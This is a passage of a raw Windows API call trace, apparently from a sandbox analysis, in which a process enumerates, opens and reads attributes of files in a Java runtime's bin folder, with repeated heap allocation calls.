lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.227] GetFileType (hFile=0x360) returned 0x1 [0091.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0091.227] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.227] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.228] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.228] CloseHandle (hObject=0x360) returned 1 [0091.228] AreFileApisANSI () returned 1 [0091.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0091.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0091.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 59 [0091.228] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.228] GetFileType (hFile=0x360) returned 0x1 [0091.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0091.228] CloseHandle (hObject=0x360) returned 1 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0091.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0091.230] AreFileApisANSI () returned 1 [0091.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0091.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll") returned 59 [0091.230] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_font_t2k.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x83640)) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0091.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.230] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1f440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javafx_iio.dll", cAlternateFileName="JAVAFX~3.DLL")) returned 1 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0091.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0091.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0091.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0091.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0091.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0091.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0091.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0091.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0091.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.231] AreFileApisANSI () returned 1 [0091.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll", lpUsedDefaultChar=0x0) returned 54 [0091.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0091.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.231] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.231] AreFileApisANSI () returned 1 [0091.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0091.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75e40 [0091.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 54 [0091.232] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.232] GetFileType (hFile=0x360) returned 0x1 [0091.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0091.232] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.232] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.232] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.233] CloseHandle (hObject=0x360) returned 1 [0091.233] AreFileApisANSI () returned 1 [0091.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0091.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75eb8 [0091.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 54 [0091.233] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.233] GetFileType (hFile=0x360) returned 0x1 [0091.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0091.233] CloseHandle (hObject=0x360) returned 1 [0091.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.235] AreFileApisANSI () returned 1 [0091.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0091.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75b70 [0091.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll") returned 54 [0091.235] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javafx_iio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javafx_iio.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1f440)) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0091.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.235] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.235] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javaw.exe", cAlternateFileName="")) returned 1 [0091.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0091.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0091.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.236] AreFileApisANSI () returned 1 [0091.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe", lpUsedDefaultChar=0x0) returned 49 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0091.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0091.237] AreFileApisANSI () returned 1 [0091.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 